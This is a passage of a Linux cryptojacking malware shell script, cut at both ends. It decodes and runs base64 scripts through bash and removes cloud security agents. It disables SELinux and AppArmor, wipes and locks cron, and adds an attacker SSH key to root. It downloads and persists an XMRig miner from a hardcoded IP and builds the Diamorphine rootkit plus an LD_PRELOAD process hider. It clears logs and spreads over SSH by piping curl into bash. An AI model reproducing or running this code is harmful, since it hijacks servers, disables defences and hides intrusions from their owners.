CBPSyAgXSIKCgoK' | base64 -d | bash 2>/dev/null 1>/dev/null

? ? echo 'IyEvYmluL2Jhc2gKCiNjaGVjayBsaW51eCBHZW50b28gb3MgCnZhcj1gbHNiX3JlbGVhc2UgLWEgfCBncmVwIEdlbnRvb2AKaWYgWyAteiAiJHt2YXJ9IiBdOyB0aGVuIAoJdmFyPWBjYXQgL2V0Yy9pc3N1ZSB8IGdyZXAgR2VudG9vYApmaQoKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbHNlCglMSU5VWF9SRUxFQVNFPSJPVEhFUiIKZmkKCnN0b3BfYWVnaXMoKXsKCWtpbGxhbGwgLTkgYWVnaXNfY2xpID4vZGV2L251bGwgMj4mMQoJa2lsbGFsbCAtOSBhZWdpc191cGRhdGUgPi9kZXYvbnVsbCAyPiYxCglraWxsYWxsIC05IGFlZ2lzX2NsaSA+L2Rldi9udWxsIDI+JjEKICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgYWVnaXMiICJbICBPSyAgXSIKfQoKc3RvcF9xdWFydHooKXsKCWtpbGxhbGwgLTkgYWVnaXNfcXVhcnR6ID4vZGV2L251bGwgMj4mMQogICAgICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgcXVhcnR6IiAiWyAgT0sgIF0iCn0KCnJlbW92ZV9hZWdpcygpewppZiBbIC1kIC91c3IvbG9jYWwvYWVnaXMgXTt0aGVuCiAgICBybSAtcmYgL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19jbGllbnQKICAgIHJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3VwZGF0ZQpmaQp9CgpyZW1vdmVfcXVhcnR6KCl7CmlmIFsgLWQgL3Vzci9sb2NhbC9hZWdpcyBdO3RoZW4KCXJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3F1YXJ0egpmaQp9CgoKdW5pbnN0YWxsX3NlcnZpY2UoKSB7CiAgIAogICBpZiBbIC1mICIvZXRjL2luaXQuZC9hZWdpcyIgXTsgdGhlbgoJCS9ldGMvaW5pdC5kL2FlZ2lzIHN0b3AgID4vZGV2L251bGwgMj4mMQoJCXJtIC1mIC9ldGMvaW5pdC5kL2FlZ2lzIAogICBmaQoKCWlmIFsgJExJTlVYX1JFTEVBU0UgPSAiR0VOVE9PIiBdOyB0aGVuCgkJcmMtdXBkYXRlIGRlbCBhZWdpcyBkZWZhdWx0IDI+L2Rldi9udWxsCgkJaWYgWyAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgXTsgdGhlbgoJCQlybSAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgPi9kZXYvbnVsbCAyPiYxOwoJCWZpCiAgICBlbGlmIFsgLWYgL2V0Yy9pbml0LmQvYWVnaXMgXTsgdGhlbgogICAgICAgICAvZXRjL2luaXQuZC9hZWdpcyAgdW5pbnN0YWxsCgkgICAgZm9yICgodmFyPTI7IHZhcjw9NTsgdmFyKyspKSBkbwoJCQlpZiBbIC1kICIvZXRjL3JjJHt2YXJ9LmQvIiBdO3RoZW4KCQkJCSBybSAtZiAiL2V0Yy9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCSAgICBlbGlmIFsgLWQgIi9ldGMvcmMuZC9yYyR7dmFyfS5kIiBdO3RoZW4KCQkJCXJtIC1mICIvZXRjL3JjLmQvcmMke3Zhcn0uZC9TODBhZWdpcyIKCQkJZmkKCQlkb25lCiAgICBmaQoKfQoKc3RvcF9hZWdpcwpzdG9wX3F1YXJ0egp1bmluc3RhbGxfc2VydmljZQpyZW1vdmVfYWVnaXMKcmVtb3ZlX3F1YXJ0egoKcHJpbnRmICIlLTQwcyAlNDBzXG4iICJVbmluc3RhbGxpbmcgYWVnaXNfcXVhcnR6IiAgIlsgIE9LICBdIgoKCgo=' | base64 -d | bash 2>/dev/null 1>/dev/null

? ? ? pkill aliyun-service 2>/dev/null 1>/dev/null

? ? ? if [ -f "/etc/init.d/agentwatch" ]; then rm -rf /etc/init.d/agentwatch 2>/dev/null 1>/dev/null ; fi

? ? ? if [ -f "/usr/sbin/aliyun-service" ]; then rm -fr /usr/sbin/aliyun-service 2>/dev/null 1>/dev/null ; fi

? ? ? if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis* 2>/dev/null 1>/dev/null ; fi

? ? ? ? if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi

? if type systemctl 2>/dev/null 1>/dev/null; then systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else if [ -f "/etc/init.d/aliyun" ]; then rm -fr /etc/init.d/aliyun 2>/dev/null 1>/dev/null ; fi ; fi

? ? if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop bcm-agent 2>/dev/null 1>/dev/null ; else service bcm-agent stop 2>/dev/null 1>/dev/null ; fi

? ? ? if type yum 2>/dev/null 1>/dev/null; then yum remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi

? ? ? ? if type apt-get 2>/dev/null 1>/dev/null; then apt-get remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi

elif ps aux | grep -i '[y]unjing' 2>/dev/null 1>/dev/null; then

if [ -f "/usr/local/qcloud/stargate/admin/uninstall.sh" ]; then /usr/local/qcloud/stargate/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi

if [ -f "/usr/local/qcloud/YunJing/uninst.sh" ]; then /usr/local/qcloud/YunJing/uninst.sh 2>/dev/null 1>/dev/null ; fi

if [ -f "/usr/local/qcloud/monitor/barad/admin/uninstall.sh" ]; then /usr/local/qcloud/monitor/barad/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi

fi

sudo sysctl kernel.nmi_watchdog=0

sysctl kernel.nmi_watchdog=0

echo '0' >/proc/sys/kernel/nmi_watchdog

echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

if ps aux | grep -i '[a]liyun'; then

? ${CURL_CMD} http://update.aegis.aliyun.com/download/uninstall.sh | bash

? ${CURL_CMD} http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash

? pkill aliyun-service

? rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service

? rm -rf /usr/local/aegis*

? systemctl stop aliyun.service

? systemctl disable aliyun.service

? service bcm-agent stop

? yum remove bcm-agent -y

? apt-get remove bcm-agent -y

elif ps aux | grep -i '[y]unjing'; then

? /usr/local/qcloud/stargate/admin/uninstall.sh

? /usr/local/qcloud/YunJing/uninst.sh

? /usr/local/qcloud/monitor/barad/admin/uninstall.sh

fi

if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then

? /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor

else

? if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 ]; then

? ? /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 stop && /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 uninstall && rm -rf /usr/local/cloudmonitor

? else

? ? echo "ali cloud monitor not running"

? fi

fi

setenforce 0

echo SELINUX=disabled >/etc/selinux/config

service apparmor stop

systemctl disable apparmor

service aliyun.service stop

systemctl disable aliyun.service

ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %

rm -rf /usr/local/aegis

}

function SetupNameServers(){

grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null

grep -q 8.8.4.4 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null

}

clmo() {

if ps aux | grep -i '[a]liyun'; then

echo "this is ali cloud"

number=$(ps -ef|grep -i dun|grep -v grep|wc -l)

until [ "$number" -eq 0 ]; do

systemctl stop aliyun

systemctl stop aegis

ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP

number=$(ps -ef|grep -i dun|grep -v grep|wc -l)

done

while? [ -d /usr/local/aegis ]

do?

ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP?

path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')

num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)

if [ $num -gt 0 ]

then?

echo "$path" exist

$path --stopdriver

else

echo "no AliSecGuard process"

fi

rm -rf /usr/local/aegis

done

else?

echo "it's not ali cloud"

fi

}

function clean_cron(){

${CHATTR} -R -ia /var/spool/cron

tntrecht -R -ia /var/spool/cron

${CHATTR} -ia /etc/crontab

tntrecht -ia /etc/crontab

${CHATTR} -R -ia /etc/cron.d

tntrecht -R -ia /etc/cron.d

${CHATTR} -R -ia /var/spool/cron/crontabs

tntrecht -R -ia /var/spool/cron/crontabs

crontab -r

rm -rf /var/spool/cron/*

rm -rf /etc/cron.d/*

rm -rf /var/spool/cron/crontabs

rm -rf /etc/crontab

}

function lock_cron()

{

${CHATTR} -R +ia /var/spool/cron

touch /etc/crontab

${CHATTR} +ia /etc/crontab

${CHATTR} -R +ia /var/spool/cron/crontabs

${CHATTR} -R +ia /etc/cron.d

}

function makesshaxx(){

echo "begin makessh"

RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"

mkdir /root/.ssh/ -p??

touch /root/.ssh/authorized_keys??

touch /root/.ssh/authorized_keys2

chmod 600 /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys2

grep -q root@puppetserver /root/.ssh/authorized_keys || ${CHATTR} -ia /root/.ssh/authorized_keys;?

grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;?

grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; ${CHATTR} +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys

grep -q root@puppetserver /root/.ssh/authorized_keys2 || ${CHATTR} -ia /root/.ssh/authorized_keys2;?

grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;?

grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; ${CHATTR} +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2

}

download_f(){

config_url=http://205.185.118.246/bWVkaWEK/config.json

miner_url=http://205.185.118.246/bWVkaWEK/xm.tar

export MOHOME="/usr/share"

cd ${MOHOME}?

${WGET_CMD} --tries=3 --timeout=10 -O ${MOHOME}/[cmake].pid ${config_url}

echo ${config_url}

if [ -f ${MOHOME}/\[cmake\] ];then

? ? echo "miner file exists"

else

? ? ${WGET_CMD} --tries=10 --timeout=10 -O ${MOHOME}/crypto? ${miner_url}

? ? if [ $? -ne 0 ];then

? ? ? ? ${WGET_CMD} --tries=2 --timeout=10 -O ${MOHOME}/crypto ${miner_url_backup}

? ? fi?

? ? if tar -xf "${MOHOME}/crypto" -C ${MOHOME};then

? ? ? ? mv ${MOHOME}/xmrig? ${MOHOME}/[cmake]??

? ? ? ? chmod a+x ${MOHOME}/[cmake]

? ? ? ? rm -rf ${MOHOME}/xmrig*

? ? fi

fi

}

setup_s(){

grep -q cmake /etc/systemd/system/cmake.service

if [ $? -eq 0 ]

then?

echo service exist

else

rm -f /etc/systemd/system/cmake.service

cat >/tmp/ext4.service << EOLB

[Unit]

Description=crypto system service

After=network.target

[Service]

Type=forking

GuessMainPID=no

ExecStart=${MOHOME}/[cmake] --config=${MOHOME}/[cmake].pid

WorkingDirectory=${MOHOME}

Restart=always

Nice=0?

RestartSec=3

[Install]

WantedBy=multi-user.target

EOLB

fi

mv /tmp/ext4.service /etc/systemd/system/cmake.service?

systemctl daemon-reload

systemctl start cmake

systemctl enable cmake

}

exec_f(){

? for nhid in $(ps aux | grep -v grep | grep '/usr/share/\[cmake\]\|masscan' | awk '{print $2}')

? ?do

? ? ?kill -31? $nhid

? ?done

}

hide_f(){

if [ -d "/usr/src/kernels/$(uname -r)/lib" ]

then?

? hi_home=${MOHOME}/..hide

? mkdir -p $hi_home

? if [ ! -d "$hi_home" ]; then mkdir -p $hi_home ; fi

? hf='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'

? echo $hf|base64 -d >$hi_home/hf.tar

? tar -xf $hi_home/hf.tar -C $hi_home/

? cd $hi_home/?

? make

? ? ? if [ -f "$hi_home/diamorphine.ko" ]

? ? ? then?

? ? ? ?insmod diamorphine.ko

? ? ? else

? ? ? echo "dia hide false"

? ? ? fi

else

? echo "other hide method"

fi

}

exec_hide(){

hi_home=/usr/share/..hide

if [ -f "$hi_home/diamorphine.ko" ]

then?

? ?echo "diamorphine loaded1"

? ?echo "hide diamorphine1"

? ?exec_f

else

? ? echo "diamorphine not loaded,execute load process"

? ? hide_f

? ? exec_f?

fi

}

localgo() {

echo > /var/spool/mail/root

echo > /var/log/wtmp

echo > /var/log/secure

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

? for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-? ${mainurl/b.sh} | bash >/dev/null 2>&1 &' & done

fi

}

exec_hide2(){

BINARY_NAME="[cmake]"

H2P=${MOHOME}/..lph

if [ "$UID" = "0" ];then

LHB_MAKE='YWxsOiBsaWJwcm9jZXNzaGlkZXIuc28KCmxpYnByb2Nlc3NoaWRlci5zbzogcHJvY2Vzc2hpZGVyLmMKCWdjYyAtV2FsbCAtZlBJQyAtc2hhcmVkIC1vIGxpYnByb2Nlc3NoaWRlci5zbyBwcm9jZXNzaGlkZXIuYyAtbGRsCgouUEhPTlkgY2xlYW46CglybSAtZiBsaWJwcm9jZXNzaGlkZXIuc28KCg=='

PROCHIDE='I2RlZmluZSBfR05VX1NPVVJDRQoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxkbGZjbi5oPgojaW5jbHVkZSA8ZGlyZW50Lmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKLyoKICogRXZlcnkgcHJvY2VzcyB3aXRoIHRoaXMgbmFtZSB3aWxsIGJlIGV4Y2x1ZGVkCiAqLwpzdGF0aWMgY29uc3QgY2hhciogcHJvY2Vzc190b19maWx0ZXIgPSAiZXZpbF9zY3JpcHQucHkiOwoKLyoKICogR2V0IGEgZGlyZWN0b3J5IG5hbWUgZ2l2ZW4gYSBESVIqIGhhbmRsZQogKi8Kc3RhdGljIGludCBnZXRfZGlyX25hbWUoRElSKiBkaXJwLCBjaGFyKiBidWYsIHNpemVfdCBzaXplKQp7CiAgICBpbnQgZmQgPSBkaXJmZChkaXJwKTsKICAgIGlmKGZkID09IC0xKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbNjRdOwogICAgc25wcmludGYodG1wLCBzaXplb2YodG1wKSwgIi9wcm9jL3NlbGYvZmQvJWQiLCBmZCk7CiAgICBzc2l6ZV90IHJldCA9IHJlYWRsaW5rKHRtcCwgYnVmLCBzaXplKTsKICAgIGlmKHJldCA9PSAtMSkgewogICAgICAgIHJldHVybiAwOwogICAgfQoKICAgIGJ1ZltyZXRdID0gMDsKICAgIHJldHVybiAxOwp9CgovKgogKiBHZXQgYSBwcm9jZXNzIG5hbWUgZ2l2ZW4gaXRzIHBpZAogKi8Kc3RhdGljIGludCBnZXRfcHJvY2Vzc19uYW1lKGNoYXIqIHBpZCwgY2hhciogYnVmKQp7CiAgICBpZihzdHJzcG4ocGlkLCAiMDEyMzQ1Njc4OSIpICE9IHN0cmxlbihwaWQpKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbMjU2XTsKICAgIHNucHJpbnRmKHRtcCwgc2l6ZW9mKHRtcCksICIvcHJvYy8lcy9zdGF0IiwgcGlkKTsKIAogICAgRklMRSogZiA9IGZvcGVuKHRtcCwgInIiKTsKICAgIGlmKGYgPT0gTlVMTCkgewogICAgICAgIHJldHVybiAwOwogICAgfQoKICAgIGlmKGZnZXRzKHRtcCwgc2l6ZW9mKHRtcCksIGYpID09IE5VTEwpIHsKICAgICAgICBmY2xvc2UoZik7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgZmNsb3NlKGYpOwoKICAgIGludCB1bnVzZWQ7CiAgICBzc2NhbmYodG1wLCAiJWQgKCVbXildcyIsICZ1bnVzZWQsIGJ1Zik7CiAgICByZXR1cm4gMTsKfQoKI2RlZmluZSBERUNMQVJFX1JFQURESVIoZGlyZW50LCByZWFkZGlyKSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXApzdGF0aWMgc3RydWN0IGRpcmVudCogKCpvcmlnaW5hbF8jI3JlYWRkaXIpKERJUiopID0gTlVMTDsgICAgICAgICAgICAgICBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKc3RydWN0IGRpcmVudCogcmVhZGRpcihESVIgKmRpcnApICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAp7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICBpZihvcmlnaW5hbF8jI3JlYWRkaXIgPT0gTlVMTCkgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICBvcmlnaW5hbF8jI3JlYWRkaXIgPSBkbHN5bShSVExEX05FWFQsICNyZWFkZGlyKTsgICAgICAgICAgICAgICBcCiAgICAgICAgaWYob3JpZ2luYWxfIyNyZWFkZGlyID09IE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkVycm9yIGluIGRsc3ltOiAlc1xuIiwgZGxlcnJvcigpKTsgICAgICAgICBcCiAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICBzdHJ1Y3QgZGlyZW50KiBkaXI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgd2hpbGUoMSkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICBkaXIgPSBvcmlnaW5hbF8jI3JlYWRkaXIoZGlycCk7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIGlmKGRpcikgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgICAgIGNoYXIgZGlyX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgY2hhciBwcm9jZXNzX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBpZihnZXRfZGlyX25hbWUoZGlycCwgZGlyX25hbWUsIHNpemVvZihkaXJfbmFtZSkpICYmICAgICAgICBcCiAgICAgICAgICAgICAgICBzdHJjbXAoZGlyX25hbWUsICIvcHJvYyIpID09IDAgJiYgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgIGdldF9wcm9jZXNzX25hbWUoZGlyLT5kX25hbWUsIHByb2Nlc3NfbmFtZSkgJiYgICAgICAgICAgXAogICAgICAgICAgIC